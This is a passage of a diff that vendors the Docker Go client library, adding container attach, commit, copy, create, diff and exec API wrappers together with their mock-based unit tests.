os.Setenv(key, value) + if err != nil { + t.Error(err) + } + } + return func(t *testing.T) { + for key, value := range oldEnvs { + err := os.Setenv(key, value) + if err != nil { + t.Error(err) + } + } + } +} + +func TestGetAPIPath(t *testing.T) { + cases := []struct { + v string + p string + q url.Values + e string + }{ + {"", "/containers/json", nil, "/containers/json"}, + {"", "/containers/json", url.Values{}, "/containers/json"}, + {"", "/containers/json", url.Values{"s": []string{"c"}}, "/containers/json?s=c"}, + {"1.22", "/containers/json", nil, "/v1.22/containers/json"}, + {"1.22", "/containers/json", url.Values{}, "/v1.22/containers/json"}, + {"1.22", "/containers/json", url.Values{"s": []string{"c"}}, "/v1.22/containers/json?s=c"}, + {"v1.22", "/containers/json", nil, "/v1.22/containers/json"}, + {"v1.22", "/containers/json", url.Values{}, "/v1.22/containers/json"}, + {"v1.22", "/containers/json", url.Values{"s": []string{"c"}}, "/v1.22/containers/json?s=c"}, + {"v1.22", "/networks/kiwl$%^", nil, "/v1.22/networks/kiwl$%25%5E"}, + } + + for _, cs := range cases { + c, err := NewClient("unix:///var/run/docker.sock", cs.v, nil, nil) + if err != nil { + t.Fatal(err) + } + g := c.getAPIPath(cs.p, cs.q) + if g != cs.e { + t.Fatalf("Expected %s, got %s", cs.e, g) + } + + err = c.Close() + if nil != err { + t.Fatalf("close client failed, error message: %s", err) + } + } +} + +func TestParseHost(t *testing.T) { + cases := []struct { + host string + proto string + addr string + base string + err bool + }{ + {"", "", "", "", true}, + {"foobar", "", "", "", true}, + {"foo://bar", "foo", "bar", "", false}, + {"tcp://localhost:2476", "tcp", "localhost:2476", "", false}, + {"tcp://localhost:2476/path", "tcp", "localhost:2476", "/path", false}, + } + + for _, cs := range cases { + p, a, b, e := ParseHost(cs.host) + if cs.err && e == nil { + t.Fatalf("expected error, got nil") + } + if !cs.err && e != nil { + t.Fatal(e) + } + if cs.proto != p { + t.Fatalf("expected proto 
%s, got %s", cs.proto, p) + } + if cs.addr != a { + t.Fatalf("expected addr %s, got %s", cs.addr, a) + } + if cs.base != b { + t.Fatalf("expected base %s, got %s", cs.base, b) + } + } +} + +func TestUpdateClientVersion(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + splitQuery := strings.Split(req.URL.Path, "/") + queryVersion := splitQuery[1] + b, err := json.Marshal(types.Version{ + APIVersion: queryVersion, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + cases := []struct { + v string + }{ + {"1.20"}, + {"v1.21"}, + {"1.22"}, + {"v1.22"}, + } + + for _, cs := range cases { + client.UpdateClientVersion(cs.v) + r, err := client.ServerVersion(context.Background()) + if err != nil { + t.Fatal(err) + } + if strings.TrimPrefix(r.APIVersion, "v") != strings.TrimPrefix(cs.v, "v") { + t.Fatalf("Expected %s, got %s", cs.v, r.APIVersion) + } + } +} + +func TestNewEnvClientSetsDefaultVersion(t *testing.T) { + // Unset environment variables + envVarKeys := []string{ + "DOCKER_HOST", + "DOCKER_API_VERSION", + "DOCKER_TLS_VERIFY", + "DOCKER_CERT_PATH", + } + envVarValues := make(map[string]string) + for _, key := range envVarKeys { + envVarValues[key] = os.Getenv(key) + os.Setenv(key, "") + } + + client, err := NewEnvClient() + if err != nil { + t.Fatal(err) + } + if client.version != DefaultVersion { + t.Fatalf("Expected %s, got %s", DefaultVersion, client.version) + } + + expected := "1.22" + os.Setenv("DOCKER_API_VERSION", expected) + client, err = NewEnvClient() + if err != nil { + t.Fatal(err) + } + if client.version != expected { + t.Fatalf("Expected %s, got %s", expected, client.version) + } + + // Restore environment variables + for _, key := range envVarKeys { + os.Setenv(key, envVarValues[key]) + } +} diff --git a/vendor/github.com/docker/docker/client/client_unix.go 
b/vendor/github.com/docker/docker/client/client_unix.go new file mode 100644 index 0000000000..89de892c85 --- /dev/null +++ b/vendor/github.com/docker/docker/client/client_unix.go @@ -0,0 +1,6 @@ +// +build linux freebsd solaris openbsd darwin + +package client + +// DefaultDockerHost defines os specific default if DOCKER_HOST is unset +const DefaultDockerHost = "unix:///var/run/docker.sock" diff --git a/vendor/github.com/docker/docker/client/client_windows.go b/vendor/github.com/docker/docker/client/client_windows.go new file mode 100644 index 0000000000..07c0c7a774 --- /dev/null +++ b/vendor/github.com/docker/docker/client/client_windows.go @@ -0,0 +1,4 @@ +package client + +// DefaultDockerHost defines os specific default if DOCKER_HOST is unset +const DefaultDockerHost = "npipe:////./pipe/docker_engine" diff --git a/vendor/github.com/docker/docker/client/container_attach.go b/vendor/github.com/docker/docker/client/container_attach.go new file mode 100644 index 0000000000..eea4682158 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_attach.go @@ -0,0 +1,37 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerAttach attaches a connection to a container in the server. +// It returns a types.HijackedConnection with the hijacked connection +// and the a reader to get output. It's up to the called to close +// the hijacked connection by calling types.HijackedResponse.Close. 
+func (cli *Client) ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) { + query := url.Values{} + if options.Stream { + query.Set("stream", "1") + } + if options.Stdin { + query.Set("stdin", "1") + } + if options.Stdout { + query.Set("stdout", "1") + } + if options.Stderr { + query.Set("stderr", "1") + } + if options.DetachKeys != "" { + query.Set("detachKeys", options.DetachKeys) + } + if options.Logs { + query.Set("logs", "1") + } + + headers := map[string][]string{"Content-Type": {"text/plain"}} + return cli.postHijacked(ctx, "/containers/"+container+"/attach", query, nil, headers) +} diff --git a/vendor/github.com/docker/docker/client/container_commit.go b/vendor/github.com/docker/docker/client/container_commit.go new file mode 100644 index 0000000000..c766d62e40 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_commit.go @@ -0,0 +1,53 @@ +package client + +import ( + "encoding/json" + "errors" + "net/url" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/reference" + "golang.org/x/net/context" +) + +// ContainerCommit applies changes into a container and creates a new tagged image. 
+func (cli *Client) ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) { + var repository, tag string + if options.Reference != "" { + distributionRef, err := distreference.ParseNamed(options.Reference) + if err != nil { + return types.IDResponse{}, err + } + + if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + return types.IDResponse{}, errors.New("refusing to create a tag with a digest reference") + } + + tag = reference.GetTagFromNamedRef(distributionRef) + repository = distributionRef.Name() + } + + query := url.Values{} + query.Set("container", container) + query.Set("repo", repository) + query.Set("tag", tag) + query.Set("comment", options.Comment) + query.Set("author", options.Author) + for _, change := range options.Changes { + query.Add("changes", change) + } + if options.Pause != true { + query.Set("pause", "0") + } + + var response types.IDResponse + resp, err := cli.post(ctx, "/commit", query, options.Config, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_commit_test.go b/vendor/github.com/docker/docker/client/container_commit_test.go new file mode 100644 index 0000000000..a844675368 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_commit_test.go @@ -0,0 +1,96 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerCommitError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerCommit(context.Background(), "nothing", types.ContainerCommitOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server 
error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerCommit(t *testing.T) { + expectedURL := "/commit" + expectedContainerID := "container_id" + specifiedReference := "repository_name:tag" + expectedRepositoryName := "repository_name" + expectedTag := "tag" + expectedComment := "comment" + expectedAuthor := "author" + expectedChanges := []string{"change1", "change2"} + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + containerID := query.Get("container") + if containerID != expectedContainerID { + return nil, fmt.Errorf("container id not set in URL query properly. Expected '%s', got %s", expectedContainerID, containerID) + } + repo := query.Get("repo") + if repo != expectedRepositoryName { + return nil, fmt.Errorf("container repo not set in URL query properly. Expected '%s', got %s", expectedRepositoryName, repo) + } + tag := query.Get("tag") + if tag != expectedTag { + return nil, fmt.Errorf("container tag not set in URL query properly. Expected '%s', got %s'", expectedTag, tag) + } + comment := query.Get("comment") + if comment != expectedComment { + return nil, fmt.Errorf("container comment not set in URL query properly. Expected '%s', got %s'", expectedComment, comment) + } + author := query.Get("author") + if author != expectedAuthor { + return nil, fmt.Errorf("container author not set in URL query properly. Expected '%s', got %s'", expectedAuthor, author) + } + pause := query.Get("pause") + if pause != "0" { + return nil, fmt.Errorf("container pause not set in URL query properly. 
Expected 'true', got %v'", pause) + } + changes := query["changes"] + if len(changes) != len(expectedChanges) { + return nil, fmt.Errorf("expected container changes size to be '%d', got %d", len(expectedChanges), len(changes)) + } + b, err := json.Marshal(types.IDResponse{ + ID: "new_container_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ContainerCommit(context.Background(), expectedContainerID, types.ContainerCommitOptions{ + Reference: specifiedReference, + Comment: expectedComment, + Author: expectedAuthor, + Changes: expectedChanges, + Pause: false, + }) + if err != nil { + t.Fatal(err) + } + if r.ID != "new_container_id" { + t.Fatalf("expected `container_id`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/container_copy.go b/vendor/github.com/docker/docker/client/container_copy.go new file mode 100644 index 0000000000..8380eeabc9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_copy.go @@ -0,0 +1,97 @@ +package client + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "net/http" + "net/url" + "path/filepath" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +// ContainerStatPath returns Stat information about a path inside the container filesystem. +func (cli *Client) ContainerStatPath(ctx context.Context, containerID, path string) (types.ContainerPathStat, error) { + query := url.Values{} + query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API. + + urlStr := fmt.Sprintf("/containers/%s/archive", containerID) + response, err := cli.head(ctx, urlStr, query, nil) + if err != nil { + return types.ContainerPathStat{}, err + } + defer ensureReaderClosed(response) + return getContainerPathStatFromHeader(response.header) +} + +// CopyToContainer copies content into the container filesystem. 
+func (cli *Client) CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error { + query := url.Values{} + query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API. + // Do not allow for an existing directory to be overwritten by a non-directory and vice versa. + if !options.AllowOverwriteDirWithFile { + query.Set("noOverwriteDirNonDir", "true") + } + + apiPath := fmt.Sprintf("/containers/%s/archive", container) + + response, err := cli.putRaw(ctx, apiPath, query, content, nil) + if err != nil { + return err + } + defer ensureReaderClosed(response) + + if response.statusCode != http.StatusOK { + return fmt.Errorf("unexpected status code from daemon: %d", response.statusCode) + } + + return nil +} + +// CopyFromContainer gets the content from the container and returns it as a Reader +// to manipulate it in the host. It's up to the caller to close the reader. +func (cli *Client) CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) { + query := make(url.Values, 1) + query.Set("path", filepath.ToSlash(srcPath)) // Normalize the paths used in the API. + + apiPath := fmt.Sprintf("/containers/%s/archive", container) + response, err := cli.get(ctx, apiPath, query, nil) + if err != nil { + return nil, types.ContainerPathStat{}, err + } + + if response.statusCode != http.StatusOK { + return nil, types.ContainerPathStat{}, fmt.Errorf("unexpected status code from daemon: %d", response.statusCode) + } + + // In order to get the copy behavior right, we need to know information + // about both the source and the destination. The response headers include + // stat info about the source that we can use in deciding exactly how to + // copy it locally. 
Along with the stat info about the local destination, + // we have everything we need to handle the multiple possibilities there + // can be when copying a file/dir from one location to another file/dir. + stat, err := getContainerPathStatFromHeader(response.header) + if err != nil { + return nil, stat, fmt.Errorf("unable to get resource stat from response: %s", err) + } + return response.body, stat, err +} + +func getContainerPathStatFromHeader(header http.Header) (types.ContainerPathStat, error) { + var stat types.ContainerPathStat + + encodedStat := header.Get("X-Docker-Container-Path-Stat") + statDecoder := base64.NewDecoder(base64.StdEncoding, strings.NewReader(encodedStat)) + + err := json.NewDecoder(statDecoder).Decode(&stat) + if err != nil { + err = fmt.Errorf("unable to decode container path stat header: %s", err) + } + + return stat, err +} diff --git a/vendor/github.com/docker/docker/client/container_copy_test.go b/vendor/github.com/docker/docker/client/container_copy_test.go new file mode 100644 index 0000000000..706a20c818 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_copy_test.go @@ -0,0 +1,244 @@ +package client + +import ( + "bytes" + "encoding/base64" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestContainerStatPathError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerStatPath(context.Background(), "container_id", "path") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestContainerStatPathNoHeaderError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: http.StatusOK, + Body: 
ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + _, err := client.ContainerStatPath(context.Background(), "container_id", "path/to/file") + if err == nil { + t.Fatalf("expected an error, got nothing") + } +} + +func TestContainerStatPath(t *testing.T) { + expectedURL := "/containers/container_id/archive" + expectedPath := "path/to/file" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "HEAD" { + return nil, fmt.Errorf("expected HEAD method, got %s", req.Method) + } + query := req.URL.Query() + path := query.Get("path") + if path != expectedPath { + return nil, fmt.Errorf("path not set in URL query properly") + } + content, err := json.Marshal(types.ContainerPathStat{ + Name: "name", + Mode: 0700, + }) + if err != nil { + return nil, err + } + base64PathStat := base64.StdEncoding.EncodeToString(content) + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + Header: http.Header{ + "X-Docker-Container-Path-Stat": []string{base64PathStat}, + }, + }, nil + }), + } + stat, err := client.ContainerStatPath(context.Background(), "container_id", expectedPath) + if err != nil { + t.Fatal(err) + } + if stat.Name != "name" { + t.Fatalf("expected container path stat name to be 'name', got '%s'", stat.Name) + } + if stat.Mode != 0700 { + t.Fatalf("expected container path stat mode to be 0700, got '%v'", stat.Mode) + } +} + +func TestCopyToContainerError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.CopyToContainer(context.Background(), "container_id", "path/to/file", bytes.NewReader([]byte("")), types.CopyToContainerOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + 
t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestCopyToContainerNotStatusOKError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNoContent, "No content")), + } + err := client.CopyToContainer(context.Background(), "container_id", "path/to/file", bytes.NewReader([]byte("")), types.CopyToContainerOptions{}) + if err == nil || err.Error() != "unexpected status code from daemon: 204" { + t.Fatalf("expected an unexpected status code error, got %v", err) + } +} + +func TestCopyToContainer(t *testing.T) { + expectedURL := "/containers/container_id/archive" + expectedPath := "path/to/file" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "PUT" { + return nil, fmt.Errorf("expected PUT method, got %s", req.Method) + } + query := req.URL.Query() + path := query.Get("path") + if path != expectedPath { + return nil, fmt.Errorf("path not set in URL query properly, expected '%s', got %s", expectedPath, path) + } + noOverwriteDirNonDir := query.Get("noOverwriteDirNonDir") + if noOverwriteDirNonDir != "true" { + return nil, fmt.Errorf("noOverwriteDirNonDir not set in URL query properly, expected true, got %s", noOverwriteDirNonDir) + } + + content, err := ioutil.ReadAll(req.Body) + if err != nil { + return nil, err + } + if err := req.Body.Close(); err != nil { + return nil, err + } + if string(content) != "content" { + return nil, fmt.Errorf("expected content to be 'content', got %s", string(content)) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + err := client.CopyToContainer(context.Background(), "container_id", expectedPath, bytes.NewReader([]byte("content")), types.CopyToContainerOptions{ + AllowOverwriteDirWithFile: false, + }) + if err != 
nil { + t.Fatal(err) + } +} + +func TestCopyFromContainerError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestCopyFromContainerNotStatusOKError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNoContent, "No content")), + } + _, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file") + if err == nil || err.Error() != "unexpected status code from daemon: 204" { + t.Fatalf("expected an unexpected status code error, got %v", err) + } +} + +func TestCopyFromContainerNoHeaderError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + _, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file") + if err == nil { + t.Fatalf("expected an error, got nothing") + } +} + +func TestCopyFromContainer(t *testing.T) { + expectedURL := "/containers/container_id/archive" + expectedPath := "path/to/file" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected PUT method, got %s", req.Method) + } + query := req.URL.Query() + path := query.Get("path") + if path != expectedPath { + return nil, fmt.Errorf("path not set in URL query properly, expected '%s', got %s", expectedPath, path) + } + + headercontent, err := json.Marshal(types.ContainerPathStat{ + Name: 
"name", + Mode: 0700, + }) + if err != nil { + return nil, err + } + base64PathStat := base64.StdEncoding.EncodeToString(headercontent) + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("content"))), + Header: http.Header{ + "X-Docker-Container-Path-Stat": []string{base64PathStat}, + }, + }, nil + }), + } + r, stat, err := client.CopyFromContainer(context.Background(), "container_id", expectedPath) + if err != nil { + t.Fatal(err) + } + if stat.Name != "name" { + t.Fatalf("expected container path stat name to be 'name', got '%s'", stat.Name) + } + if stat.Mode != 0700 { + t.Fatalf("expected container path stat mode to be 0700, got '%v'", stat.Mode) + } + content, err := ioutil.ReadAll(r) + if err != nil { + t.Fatal(err) + } + if err := r.Close(); err != nil { + t.Fatal(err) + } + if string(content) != "content" { + t.Fatalf("expected content to be 'content', got %s", string(content)) + } +} diff --git a/vendor/github.com/docker/docker/client/container_create.go b/vendor/github.com/docker/docker/client/container_create.go new file mode 100644 index 0000000000..9f627aafa6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_create.go @@ -0,0 +1,50 @@ +package client + +import ( + "encoding/json" + "net/url" + "strings" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" + "golang.org/x/net/context" +) + +type configWrapper struct { + *container.Config + HostConfig *container.HostConfig + NetworkingConfig *network.NetworkingConfig +} + +// ContainerCreate creates a new container based in the given configuration. +// It can be associated with a name, but it's not mandatory. 
+func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, containerName string) (container.ContainerCreateCreatedBody, error) { + var response container.ContainerCreateCreatedBody + + if err := cli.NewVersionError("1.25", "stop timeout"); config != nil && config.StopTimeout != nil && err != nil { + return response, err + } + + query := url.Values{} + if containerName != "" { + query.Set("name", containerName) + } + + body := configWrapper{ + Config: config, + HostConfig: hostConfig, + NetworkingConfig: networkingConfig, + } + + serverResp, err := cli.post(ctx, "/containers/create", query, body, nil) + if err != nil { + if serverResp.statusCode == 404 && strings.Contains(err.Error(), "No such image") { + return response, imageNotFoundError{config.Image} + } + return response, err + } + + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_create_test.go b/vendor/github.com/docker/docker/client/container_create_test.go new file mode 100644 index 0000000000..15dbd5ea01 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_create_test.go @@ -0,0 +1,76 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/container" + "golang.org/x/net/context" +) + +func TestContainerCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerCreate(context.Background(), nil, nil, nil, "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error while testing StatusInternalServerError, got %v", err) + } + + // 404 doesn't automatically mean an unknown image + client = &Client{ 
+ client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + _, err = client.ContainerCreate(context.Background(), nil, nil, nil, "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error while testing StatusNotFound, got %v", err) + } +} + +func TestContainerCreateImageNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "No such image")), + } + _, err := client.ContainerCreate(context.Background(), &container.Config{Image: "unknown_image"}, nil, nil, "unknown") + if err == nil || !IsErrImageNotFound(err) { + t.Fatalf("expected an imageNotFound error, got %v", err) + } +} + +func TestContainerCreateWithName(t *testing.T) { + expectedURL := "/containers/create" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + name := req.URL.Query().Get("name") + if name != "container_name" { + return nil, fmt.Errorf("container name not set in URL query properly. 
Expected `container_name`, got %s", name) + } + b, err := json.Marshal(container.ContainerCreateCreatedBody{ + ID: "container_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ContainerCreate(context.Background(), nil, nil, nil, "container_name") + if err != nil { + t.Fatal(err) + } + if r.ID != "container_id" { + t.Fatalf("expected `container_id`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/container_diff.go b/vendor/github.com/docker/docker/client/container_diff.go new file mode 100644 index 0000000000..1e3e554fc5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_diff.go @@ -0,0 +1,23 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerDiff shows differences in a container filesystem since it was started. 
+func (cli *Client) ContainerDiff(ctx context.Context, containerID string) ([]types.ContainerChange, error) { + var changes []types.ContainerChange + + serverResp, err := cli.get(ctx, "/containers/"+containerID+"/changes", url.Values{}, nil) + if err != nil { + return changes, err + } + + err = json.NewDecoder(serverResp.body).Decode(&changes) + ensureReaderClosed(serverResp) + return changes, err +} diff --git a/vendor/github.com/docker/docker/client/container_diff_test.go b/vendor/github.com/docker/docker/client/container_diff_test.go new file mode 100644 index 0000000000..1ce1117684 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_diff_test.go @@ -0,0 +1,61 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerDiffError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerDiff(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } + +} + +func TestContainerDiff(t *testing.T) { + expectedURL := "/containers/container_id/changes" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + b, err := json.Marshal([]types.ContainerChange{ + { + Kind: 0, + Path: "/path/1", + }, + { + Kind: 1, + Path: "/path/2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + changes, err := client.ContainerDiff(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + if len(changes) != 2 { + 
t.Fatalf("expected an array of 2 changes, got %v", changes) + } +} diff --git a/vendor/github.com/docker/docker/client/container_exec.go b/vendor/github.com/docker/docker/client/container_exec.go new file mode 100644 index 0000000000..0665c54fbd --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_exec.go @@ -0,0 +1,54 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerExecCreate creates a new exec configuration to run an exec process. +func (cli *Client) ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error) { + var response types.IDResponse + + if err := cli.NewVersionError("1.25", "env"); len(config.Env) != 0 && err != nil { + return response, err + } + + resp, err := cli.post(ctx, "/containers/"+container+"/exec", nil, config, nil) + if err != nil { + return response, err + } + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} + +// ContainerExecStart starts an exec process already created in the docker host. +func (cli *Client) ContainerExecStart(ctx context.Context, execID string, config types.ExecStartCheck) error { + resp, err := cli.post(ctx, "/exec/"+execID+"/start", nil, config, nil) + ensureReaderClosed(resp) + return err +} + +// ContainerExecAttach attaches a connection to an exec process in the server. +// It returns a types.HijackedResponse with the hijacked connection +// and a reader to get output. It's up to the caller to close +// the hijacked connection by calling types.HijackedResponse.Close. 
+func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) { + headers := map[string][]string{"Content-Type": {"application/json"}} + return cli.postHijacked(ctx, "/exec/"+execID+"/start", nil, config, headers) +} + +// ContainerExecInspect returns information about a specific exec process on the docker host. +func (cli *Client) ContainerExecInspect(ctx context.Context, execID string) (types.ContainerExecInspect, error) { + var response types.ContainerExecInspect + resp, err := cli.get(ctx, "/exec/"+execID+"/json", nil, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/container_exec_test.go b/vendor/github.com/docker/docker/client/container_exec_test.go new file mode 100644 index 0000000000..0e296a50ad --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_exec_test.go @@ -0,0 +1,157 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestContainerExecCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerExecCreate(context.Background(), "container_id", types.ExecConfig{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExecCreate(t *testing.T) { + expectedURL := "/containers/container_id/exec" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return 
nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + // FIXME validate the content is the given ExecConfig ? + if err := req.ParseForm(); err != nil { + return nil, err + } + execConfig := &types.ExecConfig{} + if err := json.NewDecoder(req.Body).Decode(execConfig); err != nil { + return nil, err + } + if execConfig.User != "user" { + return nil, fmt.Errorf("expected an execConfig with User == 'user', got %v", execConfig) + } + b, err := json.Marshal(types.IDResponse{ + ID: "exec_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ContainerExecCreate(context.Background(), "container_id", types.ExecConfig{ + User: "user", + }) + if err != nil { + t.Fatal(err) + } + if r.ID != "exec_id" { + t.Fatalf("expected `exec_id`, got %s", r.ID) + } +} + +func TestContainerExecStartError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerExecStart(context.Background(), "nothing", types.ExecStartCheck{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExecStart(t *testing.T) { + expectedURL := "/exec/exec_id/start" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return 